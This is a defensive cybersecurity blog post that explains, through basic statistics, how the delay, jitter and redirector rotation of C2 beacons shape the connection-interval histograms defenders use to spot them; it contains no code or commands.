Malware of the Day – Understanding C2 Beacons – Part 1 of 2
Introduction
In our previous Malware of the Day posts we used specific, fixed Command and Control (C2) beaconing properties to simulate real-world attacks. In doing so we attempted to present them as accurately as possible, that is to say as they would appear were you to encounter these specific attacks out in the wild. These real-world simulations hold tremendous value, but ultimately also have a fundamental limitation: we cannot simulate all possible attacks past, present, and future.
Today, as a complementary educational strategy, we will explore C2 beaconing properties based on first principles. We’ll examine the statistical foundations underpinning C2 beaconing behavior and, critically, seek to understand how this might affect the beacon’s appearance in AC-Hunter. The goal is to empower you to recognize not only what has been, but also what might be.
To serve this educational journey, we’ve decided to break this post into two parts. In this post, Part 1, we’ll start with a basic primer on statistical concepts central to C2 beaconing behavior (Section 1). We’ll then have a quick discussion on C2 beacons in general and explore their foundational properties (Section 2). Finally, we’ll tie these two sections together by examining how changes in core C2 beaconing behaviors affect their statistical properties and, consequently, their appearance in AC-Hunter (Section 3). In the second post, we’ll compare today’s theoretical findings to actual experimental data in AC-Hunter and RITA.
We hope that by exploring these ideas and giving you deeper fundamental insight into the factors influencing the appearance of C2 beacons in RITA/AC-Hunter, we can help keep your organization safe against a wider range of possible attacks.
Section 1: Basic Statistical Primer
1.1. Prelude
To lay the groundwork for our exploration, let’s quickly review some essential statistical concepts. Don’t worry – we’ve distilled this lesson to the bare essentials, focusing only on ideas directly relevant to our discussion. We’ve avoided unnecessary jargon, formulas, and complex terminology. Think of this as a casual conversation about basic logic rather than a formal statistics lesson. This brief overview will ensure we’re all on the same page and ready to dive into the main topic.
1.2. Mean
Let’s start with something we all already know – the mean. The mean is simply another term for average. It’s calculated by summing a series of numbers and then dividing the result by the number of values in the series.
Consider the following example:
We have the series [4, 5, 6].
Our sum is 4 + 5 + 6 = 15.
We have 3 numbers in total.
So our mean is 15 / 3 = 5.
1.3. Mode
The next important foundational term is mode. The mode is simply the value that appears most frequently in a set of numbers.
For example, if we have a set of numbers consisting of 1, 3, 3, 3, 3, and 5, our mode is 3. This is because the number 3 appears four times, which is more frequent than either 1 or 5.
1.4. Percentile
The next important idea is that of percentile, which is a way to understand where a value stands in relation to others in the same set. It’s usually expressed as the “nth percentile,” meaning a value is greater than n percent of the total values in the set.
For example, if you score in the 90th percentile on a test in a class of 100, you performed better than 90 other students. But as mentioned, the real value of percentile is in its ability to convey the relationship to other values in a set.
Consider this: If I say you got a D on a test, it might sound like you did poorly. However, if I add that it’s in the 95th percentile, it means that it was probably a very difficult test, and you did exceptionally well compared to your classmates. Conversely, if I say you got a B+, but were in the 10th percentile, it means 90% of the class did better than you, suggesting it was likely an extremely easy test.
1.5. Deviation
Next, let’s discuss the concept of deviation, which essentially describes how “spread out” a dataset is. While it’s often expressed as MAD (median absolute deviation), we’ll focus on the general idea rather than technical definitions.
Consider these two sets of numbers:
Set A = [8, 9, 9, 9, 10, 10, 10, 10, 11, 11, 11, 12]
Set B = [3, 4, 4, 4, 10, 10, 10, 10, 16, 16, 16, 17]
If we calculate the mean and mode for these sets, they’re identical for both: 10. Looking at just these measures might give the false impression that the sets are essentially the same. However, we can intuitively see that the numbers in Set A are clustered together, while those in Set B are much further apart.
This difference becomes even clearer if we plot how often each number appears, as shown in Figure 1 below.
As we can see, although both sets have identical mean and mode, Set A is relatively narrow while Set B is relatively broad. We can say that A has a much lower deviation (the numbers in the set deviate less from the mean) than B, which has higher deviation. So in essence, deviation tell us how spread out (or close together) values are in a set.
By the way – this type of graph, where we plot certain values on the X (horizontal) axis against the number of times those values appear in a dataset on the Y-axis (vertical), is called a histogram. It’s important to understand this concept as it’s central to how we analyze beaconing behavior – it’s a key feature of AC-Hunter. If you’d like a more in-depth explanation of histograms, please feel free to watch this video.
1.6. Skewness
The final concept I want to introduce is skewness – which is essentially a measure of how symmetrical a histogram is. Figure 2 below shows what’s often called a “normal distribution,” or more colloquially, a “bell curve.”
In this perfectly symmetrical graph, a key point to note is that our mean and mode are equal to each other. As we discussed earlier, the mode is the number that appears most frequently, and since a histogram plots frequency, it follows that the highest point on our graph will always be the mode. Because the graph is symmetrical, our mean is exactly in the middle, coinciding with the mode.
Now, let’s consider what would happen if our dataset changed so that most of the data appeared after our mode – see Figure 3 below.
We can see that our graph has become asymmetrical. We say that our skewness has increased, and specifically, our graph now displays positive skew. While our mode is still at the peak (as it always will be), the majority of our data now appears after the mode, causing our mean to shift away from it.
Conversely, when the opposite happens—that is, when the majority of the data appears before our mode—we get what we can see in Figure 4 below.
In this case, we once again have an asymmetrical graph, but instead of the mean following the mode, it now precedes it. This is what we call negative skew.
And that’s it – these are all the foundational statistical ideas and terms we need to fully explore C2 beaconing behavior. Now that we’ve laid this foundation, let’s quickly ensure we’re all on the same page regarding C2 beaconing and its most essential properties.
Section 2: C2 Beacons and Their Fundamental Properties
2.1. What Exactly is C2?
As Active Countermeasures COO Chris Brenton is fond of saying: “malware does not break the rules, but bends them.” This principle applies to C2, which can best be thought of as malware that bends the rules of the Client-Server model.
So first – what is a “normal” Client-Server model? In its simplest form, it’s just two systems communicating over a network, typically the internet. Then, based on the relationship each system has to the other in this communication, one will assume the role of client, while the other will be the server.
Let’s consider a scenario where one system is browsing a website and wants to download a particular resource, like a PDF file. This PDF file has to exist somewhere, it has to be stored on the hard drive of some system out there on the internet, and that system has to be able to serve it to other systems that want to download it.
In this scenario:
- The system that wants to download the PDF is our client.
- The system serving the PDF is the server.
For this event to take place, four things will occur:
- The client initiates contact.
- The client and server perform a 3-way handshake to establish a connection.
- The client requests the PDF.
- The server responds with the requested PDF.
As mentioned earlier, C2 is essentially malware that takes the same Client-Server model but bends the rules. In this case, our client is no longer someone actively browsing the internet using their computer, but an unwitting participant. Their system, infected with malware, reaches out and connects back to a server without the user driving the action. And the server is the interface for the threat actor – it’s under their immediate control.
Just like in our “normal” model, the client (now the infected system) initiates contact with the server, but this time because it’s programmed to do so. The three-way handshake is performed, and the connection is established, similar to the standard process. But this is where things really get interesting.
Instead of requesting a resource like a PDF, the client (infected system) asks the server if it has any instructions (commands) for it. Depending on the server’s response, one of two things can happen:
- If the server has no instructions, the connection is simply terminated.
- If the server does have an instruction, it responds to the client with the command, after which the connection is also terminated.
But since the client is programmed to reach out to the server periodically, it will connect back again after a set amount of time. If it received instructions during the previous connection (for example, to check what processes are running on the local system), it will send the results to the server (typically via a POST method) once the new connection has been established.
This reveals another interesting inversion of the typical Client-Server model: while the server primarily serves instructions (and occasionally other post-exploitation modules/scripts), it’s often the client sending data to the server.
So in essence, C2 is a malicious Client-Server model using an unwitting client to execute commands on behalf of, and serve data to, a server under the immediate control of a threat actor. While this explanation strips away nuance and omits exceptions, it serves as a useful guiding principle for understanding C2 operations.
2.2. What is a C2 Beacon?
A C2 beacon is the malware that transforms an unsuspecting host into an unwitting client. It’s the software running on a victim system that connects back to a C2 server to request instructions, executes those commands, and returns any required output. The beacon forms one half of the C2 system, with the other half called the “C2 server” or, in Cobalt Strike terminology, the “Team Server”.
It’s worth noting that while “beacon” is the preferred term in the Cobalt Strike framework, various frameworks use different terminology. For example:
- Sliver calls them “implants”
- Covenant refers to them as “grunts”
- RATs (Remote Access Trojans) often call them “stubs”
Despite the varied terminology, they all refer to the same concept: the software that turns a host into an unwitting client. Since we’ll be working with Cobalt Strike in this article, we’ll use either “beacon”, or “C2 client” when speaking more generally.
2.3. What are the Main Properties of C2 Beacons?
Now as I already said, the entire C2 process (or rather, a round/instance of the process), starts with the beacon connecting to the server and requesting instructions. But, as I also said – the client is not under the immediate control of the attacker. Meaning – the attacker is not sitting directly in front of that host system typing away at the keyboard. The attacker has direct access to the C2 server, and through it indirect access to the C2 client.
So for the C2 client to “make the first move” – that is, initiate the connection to the C2 server – there needs to be a predetermined method for doing so. In other words, it needs to be pre-programmed.
In early C2 frameworks like Metasploit, this process was straightforward. Once the connection was established, it was maintained continuously. This meant that the attacker only needed to run the initial payload once to create the connection. After that, the connection was maintained and they could send commands to the client at will.
However, as the inevitable evolutionary arms race progressed, it soon became trivial for defenders to identify potential C2 connections by simply spotting connections that ran for days on end. This development forced attackers to innovate, and unsurprisingly, innovate they did.
The first improvement was the shift to periodic connections using delay. Instead of maintaining one long, continuous connection, the client would now:
- Connect to the server
- Ask for an instruction (and possibly send requested data)
- Receive a reply
- Kill that connection
Then, after a set amount of time (i.e., the delay) – let’s say 30 seconds – it would reconnect and repeat the process. This approach eliminated the easily recognizable long-standing connection that defenders could identify. By constantly establishing and killing connections, attackers made their C2 traffic much harder to detect. For the time being, this gave the advantage back to the attackers.
But perhaps you might quickly spot another easy way to detect static delay – the fact that the connection happens from the client to the server at a fixed interval. For example, if one were to examine the data after three days, we’d see that local host X made 8,640 connections to external host Y, with each connection occurring exactly 30 seconds apart. This is clearly an unusual pattern, not something we’d expect to be produced by a typical user. Once again, defenders were able to leverage this fact to their advantage, making it relatively easy to spot C2 activity on a network.
The innovative response to this weakness came in the form of what’s known as jitter, which is essentially a technique to introduce variation into the delay. In addition to selecting a specific delay for a beacon, attackers can now specify a percentage by which this delay should pseudo-randomly vary each time.
For example, let’s say we create a beacon with a delay of 20 seconds and select 50% jitter. Fifty percent of 20 is 10 seconds, which means the total range for the period between subsequent connections can now be anywhere between 10 seconds (20 – 10) and 30 seconds (20 + 10). Because each subsequent connection has variable timing, it once again becomes harder for defenders to spot the pattern.
While there are numerous more nuanced and advanced techniques to extend beaconing further, for now, we’ll focus on just one more dimension in addition to the two core properties of delay and jitter: the use of multiple redirectors and a chosen rotation strategy. To understand this, let’s quickly take a step back and explore exactly what redirectors are.
2.4. What are C2 Redirectors?
So far, we’ve discussed C2 activity as implying a direct connection between the C2 client and server without any intermediary. While this is a good elementary way to explore the concept, in practice, especially when dealing with more advanced adversaries, the C2 client often first connects outbound to a redirector before being passed to the C2 server. Similarly, when the server responds, it first connects to the redirector, which then completes the loop back to the C2 client – see Figure 5 shown below.
If this idea of a forwarding host sitting between two other systems sounds familiar, it’s because this is essentially a proxy. However, in the context of C2, especially within Cobalt Strike, it’s often called a redirector. While I’ll stick to the term “redirector” for consistency, it’s important to understand that a redirector is fundamentally the same as a proxy.
Without delving too deeply into this topic, it’s valuable to understand why redirectors are employed. We can distill it down to two main reasons: minimizing reactivation energy and resiliency through redundancy.
- Minimizing reactivation energy: This refers to the fact that it’s easier and quicker to create a C2 redirector (often requiring just a single command) than to perform a server swap in a C2 setup. By including a redirector, we ensure that if the C2 connection is discovered, the server’s identity remains hidden. The overall compromise can be salvaged by creating a new redirector, instead of a new server, which is much riskier and more complicated.
- Resiliency through redundancy: Redirectors allow for multiple connections between a single client and server, providing redundancy. As is often the case in information technology, redundancy can create resilience. Should a single connection fail or be discovered, the alternate routes ensure that the overall connection between server and client is maintained. Employing multiple redirectors ensures that the operation doesn’t hinge on a single point of failure.
2.5. C2 Redirectors Host Rotation Strategies
When we have multiple redirectors, you can likely deduce that there are different ways, or patterns, we can employ in deciding how to route the communication. This pattern is termed the “host rotation strategy”, and I think the best way to understand it is by way of a simple example. So let’s consider a simple case with only two redirectors between the server and client, creating two paths, A and B – as shown in Figure 6.
While there are other, lesser-known host rotation strategies that we’ll explore in the future, today we’ll focus on the two most common types: round robin and random.
- Round Robin: This strategy is simple and deterministic. It chooses one path, then the other, and repeats the process. In other words, it follows the pattern: A, B, A, B, and so on.
- Random: Unlike the previous strategy, random is non-deterministic. Each time a request is to be sent, it essentially “flips a coin” to decide whether to use path A or B. This means the sequence could be unpredictable, such as: A, A, A, B, A, B, B. Or it could be entirely different, like: B, A, B, B, A, A, B.
Initially, it might seem difficult to detect the random host rotation strategy due to its non-deterministic nature. However, even if the exact pattern is near-impossible to determine, we can predict with a high level of accuracy how often we’d expect each path to be used, due to the symmetrical outcome probabilities (50/50). This becomes especially true as the sample size increases; the outcome in terms of frequency becomes increasingly predictable.
The coin-flipping analogy is indeed an excellent model for understanding this concept. In both cases, there’s always a choice between one of two outcomes, and present outcomes are independent of past ones. If you flip a coin twice, it might randomly land heads twice – not an unlikely outcome. In this case, heads occurred 100% of the time, and tails 0%.
However, if you flip a coin 1 million times, the chances of it landing only on heads 1 million times is virtually nil. Rather, it will gravitate towards each outcome (heads and tails) occurring about 500,000 times, or 50% each. So despite the fact that we are unable to predict the exact path it takes to get there, we can predict with a high degree of confidence where it will end up.
We’ve now reached the point where we can tie everything together – the statistical concepts we learned at the start with the various properties of beacons we’ve just discussed. In the coming section, we’ll explore how variations in beacon properties affect the various statistical properties.
Section 3: How Changes in C2 Beacons Affect Their Statistical Properties
3.1. Changes in Delay
Since we’ll explore all changes relative to one another, let’s first define our “base” histogram – as shown in Figure 7 below.
So perhaps the symbols on the X-axis might seem a little overwhelming, but stick with me for just a moment and I promise that soon it will all make perfect sense.
As explained in the previous section, when we apply jitter (j) to a beacon in Cobalt Strike, that amount is subtracted from the delay (D) to determine the range of values it can potentially assume.
Thus, as can be seen in the image above, the maximum value our histogram will have on the x-axis is D (i.e. the delay), while the minimum value can be calculated as the delay minus the delay times the jitter (in percent). Mathematically we can express this minimum value as D – Dj, which may be rewritten as D*(1-j).
Further, as has been mentioned before, the highest point on our histogram will always be the mode, here represented by the symbol Mo. It then also follows that if Mo is exactly halfway between D and D(1-j), that its value is then D – (Dj/2). Which in turn can be rewritten as D*(2-j)/2.
To recap then, our minimum range value, maximum range value, and mode can be determined with:
And to solidify this, let’s quickly apply these formulas to our simple example from 2.3., with a delay of 40 seconds (D = 40), and jitter of 25% (j = 0.25).
Minimum Range Value is = 40*(1 – 0.25) = 30.
Mode = (40*(2 – 0.25))/2 = 35.
Minimum Range Value is = 40.
So as far as our base histogram goes, that’s the 3 important values on the x-axis and how we can calculate them. On the y-axis, we have the maximum number of times we observed a connection with that specific delay, represented by n. And, since this is a perfectly symmetrical bell curve, it follows that our mean is equal to our mode.
Now, let’s consider what happens if we double our delay to 2D. As shown in Figure 8 below, two immediate changes are apparent.
The first change is obvious and expected – our entire bell curve shifts to the right since the delay (and thus mode) is twice as large as it was before. Consequently, our minimum and maximum range values, as well as our mode, will now double to 60 (min), 70 (mode), and 80 (max) respectively.
The second change we can see is that, within the same timeframe, the frequency of occurrence will halve (n/2).
This second change occurs because there’s an inverse relationship between delay and the number of times we can expect to see that connection in any given time period. For example:
- If our delay is 30 seconds, in 1 hour we’ll expect to see it a maximum of 120 times. (Note: I say maximum because it will actually be quite a bit less due to jitter spreading our connections out over multiple values. However, it could never be more than 120.)
- If we double our delay to 60 seconds, we’d expect to see it a maximum of 60 times in the same 1-hour period.
Now, let’s consider what happens if we do the opposite and halve our delay to 0.5D. As expected, we see the reverse effects – as shown in Figure 9 below.
Our curve now shifts to the left as our range minimum and maximum values, as well as mode also halves. And since each subsequent connection now takes half as long, in any given time period we’d expect the total number of connections to double (2n).
Please note that though the height of our graph changes (due to increase/decrease in n), the shape of our graph does not change. This is because the change in width and height stay fixed relative to each other. The shape of the histogram is primarily influenced by jitter, which was kept fixed in this example.
3.2. Changes in Jitter
Next, let’s consider the scenario where our delay remains fixed, but we vary our jitter. We’ll once again use the histogram from Figure 7 as our baseline.
First, let’s examine what happens when we increase jitter – as shown in Figure 10.
Several key observations can be made about the effect of increasing jitter. First, since we are only changing jitter and not delay, our maximum range value (which is of course equal to delay), does not change. So it’s as if the right side of our histogram is anchored to a fixed point, and changes in jitter will simply shift it to the left, relative to our fixed point on the right.
As a consequence, changes in jitter changes the shape of our graph significantly – it’s as if someone grabbed the left side of our graph and pulled it to the left, “flattening” out the curve.
As a result, our graph becomes broader. This should sound familiar – it’s a description of what happens when deviation increases. By increasing jitter, our values spread out over a larger range, deviating more from the central value.
Accompanying this change in the width of the graph is a decrease in the maximum frequency it can attain. This makes sense intuitively: since our connections are now spread out over a larger range, the probability of a connection falling exactly on the central value decreases.
Conversely, if we were to decrease jitter, we’d see the opposite changes take place, as illustrated in Figure 11 below.
When we decrease jitter, our graph becomes noticeably narrower. This occurs because the connections are now spread out over a smaller range of possible numbers. As a consequence, the maximum possible frequency of our mode increases.
Again, this makes intuitive sense: with fewer values that the connections can assume, there’s a higher probability that any given connection will fall exactly on the mode.
Finally, let’s consider one more scenario: what happens if we remove jitter altogether? While this is less common in modern attacks, it’s certainly not impossible and thus important to be aware of.
Let’s think this through. If the delay is a certain value, say 20 seconds, and there is no jitter, we won’t see a bell curve any longer. Instead, since all the values fall on a single point, we’ll expect to see a single bar exactly at 20 seconds, as illustrated in Figure 12 below.
In this case, since our entire graph is on a single point, it also means that mode and delay are equal to one another – in this example they would both be 20.
Further, we can predict our frequency of occurrence with much greater accuracy. In this example (with a delay of 20 seconds), we’d expect to see 3 connections in a minute, and thus 180 connections in an hour. And since all the values are now exactly 20 seconds apart and not spread out, that’s the actual value we’d expect to see.
3.3. Employing a Round Robin Host Rotation Strategy in Jitter
As mentioned earlier, with a round robin rotation strategy, the connections rotate one by one in a deterministic manner between each redirector. If we have two redirectors, this effectively doubles the delay for each individual redirector.
Let’s consider an example: Say our delay is 10 seconds. The sequence would go like this:
- Connect via redirector A
- Wait 10 seconds
- Connect via redirector B
- Wait 10 seconds
- Connect via redirector A again
As we can see, the time that passes between subsequent connections via the same redirector is now 20 seconds. So effectively, the graph that results for each individual redirector is the same as what we’d see if we were to double the delay (as shown in Figure 7 above) with a single (or no) redirector.
The key takeaway for the round robin host rotation strategy is this: you take the delay and multiply it by the number of redirectors. So if they were using four redirectors with a delay of 20 seconds, then the graph for each individual redirector would be identical to looking at the graph of a single redirector (or, no redirector) with a delay of 80 seconds.
3.4. Employing a Random Rotation Strategy in Jitter
When we consider the randomized host rotation strategy, things become much more interesting. As mentioned earlier, we can perfectly model this strategy using two redirectors with the idea of flipping a coin.
In a coin flip, there’s an equal 50% chance of landing on either heads or tails. Crucially, each flip is independent – past events have no influence on future outcomes. Every single time you flip a coin, either result has exactly a 50% chance of happening, regardless of previous outcomes.
The probability becomes more intriguing when we consider consecutive outcomes. The chance of getting heads twice in a row is 25% (0.50 * 0.50 = 0.25), and three times in a row is 12.5% (0.50 * 0.50 * 0.50 = 0.125).
So every time, the chance of consecutively landing on the same side, that is to say the odds of the same server being randomly selected, is halved. And so now let’s connect this to our histogram – Figure 13 below.
In this graph, we can see our intervals as D, 2D, 3D (i.e., whole multiples of our delay) on the x-axis. Correspondingly, on the y-axis, we observe that the probable frequency of occurrence halves for each consecutive delay (n/2, n/4, n/8). This aligns perfectly with what we would expect according to the “coin flip” model we just discussed.
The shape of this graph is likely familiar, as it’s no longer symmetrical but shows positive skew, or a “long tail”. As a consequence, even though our mode is still represented by D (our delay), the mean has now shifted to the right and is no longer equal to the mode.
It’s important to note that this example, where our bars line up perfectly with whole multiples of our delay, reflects a case without any jitter. The introduction of jitter maintains the overall shape but adds another layer of complexity to this scenario. However, to avoid confusion in this theoretical discussion, we’ve decided to only explore those changes in Part 2, where we’ll examine actual results from AC-Hunter.
Conclusion
Today’s Malware of the Day report provided an in-depth theoretical exploration of the fundamental properties of C2 beacons, related statistical concepts, and how altering these properties would affect their appearance in AC-Hunter.
Specifically, we:
- Explored statistical concepts of mean, mode, deviation, and skewness
- Examined C2 frameworks and beacons
- Discussed delay and jitter in relation to C2 beacons
- Explored C2 redirectors and the two most common host rotation strategies – round robin and random
- Analyzed how changes in delay would affect the histogram in AC-Hunter
- Investigated how changes in jitter would affect the histogram in AC-Hunter
- Examined how employing either a round robin or random host rotation strategy with multiple redirectors would affect the histogram in AC-Hunter
While we hope today’s theoretical journey served a useful educational goal, it’s primarily a prelude to the following part, where we’ll review actual datasets to observe first-hand the effects of changing C2 beaconing properties. By first laying a solid theoretical foundation and then reinforcing those concepts with findings from actual compromises, we aim to help you become proficient at harnessing the full potential of AC-Hunter.
We’ll conclude with a reminder: developing a lucid and in-depth understanding of C2 beaconing properties and their potential appearances in AC-Hunter will enable you to ensure that your organization remains protected against these types of attacks. We’re grateful to be on this journey together to ensure your organization remains safe and secure.
Video Summary
Capture Files
Proceed to Part 2 for PCAPs and Zeek log capture files.
Understanding C2 Beacons Part 2 >
Faan has a profound love for the natural world, technology, design, and retro aesthetics. He is incredibly grateful to have discovered cybersecurity as a path relatively late in his life, and his main interests are threat hunting and post-exploitation custom tooling, in particular C2 frameworks and RATs.